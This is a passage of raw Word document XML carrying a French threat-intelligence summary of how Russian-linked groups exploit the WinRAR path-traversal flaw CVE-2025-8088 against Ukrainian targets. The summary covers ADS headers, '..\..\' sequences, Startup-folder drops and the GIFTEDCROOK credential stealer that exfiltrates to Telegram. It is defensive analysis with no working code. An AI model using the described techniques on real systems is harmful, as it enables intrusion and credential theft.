            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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rejoints par un nombre bien plus important de groupes distincts ciblant l’Ukraine.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7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2961028</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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tendance commune se dégage de ces groupes : l’exploitation rapide des vulnérabilités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8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3145178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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des logiciels largement utilisés. La vulnérabilité CVE-2025-8088 de WinRAR, au cœur de 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9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3329328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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rapport, a été signalée pour la première fois en juillet 2025 en tant que vulnérabilité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zero-day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0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3513478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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exploitée par ROMCOM ; elle a depuis été exploitée par d’autres groupes, notamment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1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3697628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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Sandworm et Turla. SHADOW-EARTH-066 (connu sous le nom d’UAC-0226) et Gamaredon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2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3881778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2604500" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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45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ont également exploité cette vulnérabilité.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3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4154828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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WinRAR est profondément ancré dans les opérations quotidiennes des organisations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4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4338978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ukrainiennes, ce qui en fait une cible de choix pour les attaques. CVE-2025-8088 est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5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4523128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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faille de traversée de chemin (CVSS 8,4), corrigée dans WinRAR 7.13 en juillet 2025,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4707278</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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permet à un attaquant d’écrire silencieusement des fichiers en dehors du répertoire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7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4891428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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d’extraction via les flux de données alternatifs NTFS (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Alternate Data Streams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). Une fois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8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5075578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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la victime ouvre l’archive, aucune autre interaction n’est nécessaire ; elle ne voit qu’un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9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5259728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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document leurre. Tous les échantillons que Trend Micro a analysé exploitent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0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5443878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="819833" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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98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vulnérabilité.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1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5716928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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Dans ce rapport, Trend Micro a analysé deux campagnes distinctes qui exploitent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2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5901078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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vulnérabilité CVE-2025-8088 contre des cibles ukrainiennes. La première est attribuée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3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6085228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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SHADOW-EARTH-066 et déploie une version mise à jour du voleur d’informations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4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6269378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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GIFTEDCROOK, qui récupère rapidement des identifiants et des documents avant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6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6453528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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s’autodétruire. La seconde est attribuée à Gamaredon et déploie des outils d’espionnage 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7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6637678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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une chaîne basée sur HTA. Les deux groupes utilisent des outils et des infrastructures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8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6821828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3147933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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7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différents, mais partagent le même point d’entrée.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9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7367928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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</w:rPr>
                          <w:t xml:space="preserve">Remarque : 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la seconde analyse présentée par Trend Micro a déjà été réalisée par Sekoia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0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7541283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2604407" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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440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 l’article d’avant et est donc omise ici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1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8077232</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3806563" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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6563" cy="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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2. La vulnérabilité : CVE-2025-8088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2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8531883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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Les victimes reçoivent une archive RAR, généralement par e-mail. Lorsqu’elles ouvrent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3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8716033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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l’archive avec une ancienne version de WinRAR, un fichier PDF s’affiche. Ce PDF peut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4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8900183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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ressembler à une invitation à comparaître (tel que présenté sur l’image suivante), à un avis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5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9084333</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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administratif ou à un document du ministère de la Défense. La victime ne voit rien d’autre,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6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9268483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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mais en arrière-plan, WinRAR a discrètement créé des fichiers supplémentaires à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7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9452633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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emplacements situés en dehors du répertoire d’extraction, tels que le dossier de démarrage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83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6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932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6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035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6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137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6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240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6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8634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1447174</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="5322569"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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5322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532256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5322569"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="532256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9568" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2740024</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8374389</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="608333" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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33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33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608330" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60833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3664" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4354195</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8374389</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="363223" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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22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219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363219" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36321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4688" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1649729</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1477007</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4262120" cy="5009527"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="365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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-14" r="0" t="-12" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4262120" cy="50095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62120" h="5009527">
                          <a:moveTo>
                            <a:pt x="0" y="5009527"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4262120" y="5009527"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4262120" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="500952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571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6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673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6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7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36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de Windows. Aucune boîte de dialogue ni aucun avertissement n’apparaît. Ces fichiers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8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1144928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3606010" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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601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s’exécutent lors de la prochaine connexion de l’utilisateur.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79808" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1002030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6473210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5627181" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7181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21 – Exemple de document leurre : une convocation judiciaire ukrainienne falsifiée accusant la cible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0832" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>920115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6614815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5756715" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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6715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"diffuser de fausses rumeurs", dans le but de créer un sentiment d’urgence et de contraindre la victime à interagir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1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6852308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Les deux campagnes examinées dans cet article utilisaient la vulnérabilité CVE-2025-8088,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2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7025663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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qui est liée à une vulnérabilité antérieure de traversée de répertoires (CVE-2025-6218,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3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7199018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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corrigée dans WinRAR 7.12), mais qui exploite un chemin d'exécution différent via les flux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4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7372373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2076434" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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643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données alternatifs NTFS (ADS).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5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7647328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ADS sont une fonctionnalité du système de fichiers NTFS qui permet d’associer des flux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6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7820683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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 données nommés supplémentaires à un fichier. Parmi leurs utilisations légitimes figure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8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7994038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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stockage de métadonnées, telles que les identifiants de zone ajoutés par les navigateurs,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89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8167393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mais les ADS peuvent égal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ement co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ntenir des donn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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ées a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rbitraires. Les archives RAR5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0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8359363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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peuvent inclure des en-têtes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SERVICE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(type d’en-tête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0x03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) avec le marqueur STMz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1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8556013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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représenter les métadonnées ADS. Les versions de WinRAR antérieures à la version 7.13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2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8729368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ne validaient pas les séquences de traversée de répertoires dans ces noms ADS, ce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3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8902723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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permettait à un attaquant d’intégrer des séquences ..\..\ dans les entrées STMz et d’écrire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4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9076078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5471043" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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710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des fichiers à des emplacements arbitraires. Le schéma suivant illustre ce mécanisme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51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61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6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72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6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82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6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92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90233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9581524</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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4384" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2245995</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8952239</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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6432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8952239</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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74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990597</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="3936999"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="368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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-15" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="39369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3936999">
                          <a:moveTo>
                            <a:pt x="0" y="3936999"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="3936999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393699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848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6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950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6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0528" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1932940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4904125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3732936" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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293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22 – Fonctionnement du mécanisme exploitant la CVE-2025-8088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1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5392375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5848847" cy="262309"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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8847" cy="2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35"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3. SHADOW-EARTH-066 : de la campagne GIFTEDCROOK à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2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5675585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2350071" cy="262309"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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50071" cy="2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34"/>
                          </w:rPr>
                          <w:t xml:space="preserve">chaîne d'exploits WinRAR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3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6200568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="877523" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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7523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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.1. Contexte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4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6511313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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SHADOW-EARTH-066 est la désignation provisoire que Trend Micro a attribuée au groupe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5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6695463</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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d’acteurs malveillants suivi par le CERT-UA sous le nom d’UAC-0226, dont les activités ont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6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6879613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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été documentées pour la première fois dans l’avis n° 14303 du CERT-UA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38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en avril 2025.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7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7063763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Depuis au moins février 2025, cette campagne cible des centres d’innovation militaire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8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7247913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ukrainiens, des formations militaires, des services de police et des collectivités locales situés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9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7432063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2588994" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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89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près de la frontière orientale de l’Ukraine.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0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7705113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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La campagne initiale utilisait des e-mails de </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">spear phishing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contenant des fichiers Excel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1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7878468</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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(.xlsm) avec macros activées, faisant référence au déminage, aux amendes administratives,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2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8051823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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à la production de drones et à l’indemnisation pour les biens détruits. Les charges utiles,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3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8225178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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stockées sous forme de chaînes encodées en base64 dans des cellules Excel, comprenaient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4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8398533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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un </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">reverse shell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.NET et un voleur d’identifiants en C/C++ que le CERT-UA a baptisé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5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8571888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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GIFTEDCROOK. La première version était un exécutable autonome qui volait les identifiants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6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8745243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">de navigation de C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hrome, Edge et Firefox, les archivait à l’aide de la commande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793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8937213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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Compress-Archive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 de Powershell, puis exfiltrait l’archive vers un canal Telegram.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8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9133863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4522657" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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226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jetons des bots et les identifiants des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chats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étaient codés en dur en clair.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9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2029284" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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284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38</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-4"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://cert.gov.ua/article/6282946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10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203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305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408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51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946368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3228349</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5311140" cy="215268"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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1140" cy="2152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11140" h="215265">
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3883660" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4538345" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4538345" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5310504" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5310504" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4537710" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="531114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47392" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5233034</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3442979</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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49440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3442979</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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53536" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6460490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3658879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="200659" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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65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5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200024" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="200024" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="20065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57632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3873509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1101090" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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09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09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100455" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1100455" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="110109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1728" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6460490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4089409</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="200659" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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65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59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200024" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="200024" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="20065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5824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4304039</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1101090" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37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109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109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100455" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1100455" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="110109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6848" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1522730</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4883147</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4514850" cy="4403089"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="371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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="0" r="-14" t="-14" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4514850" cy="44030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14850" h="4403089">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
